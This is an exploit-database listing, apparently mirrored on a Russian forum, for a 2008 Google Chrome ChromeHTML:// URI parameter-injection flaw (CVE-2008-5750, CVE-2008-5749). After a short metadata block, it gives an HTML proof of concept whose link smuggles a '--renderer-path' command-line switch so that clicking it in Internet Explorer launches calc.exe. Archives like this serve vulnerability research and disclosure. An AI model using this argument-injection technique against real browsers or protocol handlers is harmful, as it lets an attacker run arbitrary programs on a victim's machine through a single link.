- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7566
- Проверка EDB
-
- Пройдено
- Автор
- NINE:SITUATIONS:GROUP
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2008-5750 cve-2008-5749
- Дата публикации
- 2008-12-23
HTML:
<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
# milw0rm.com [2008-12-23]- Источник
- www.exploit-db.com
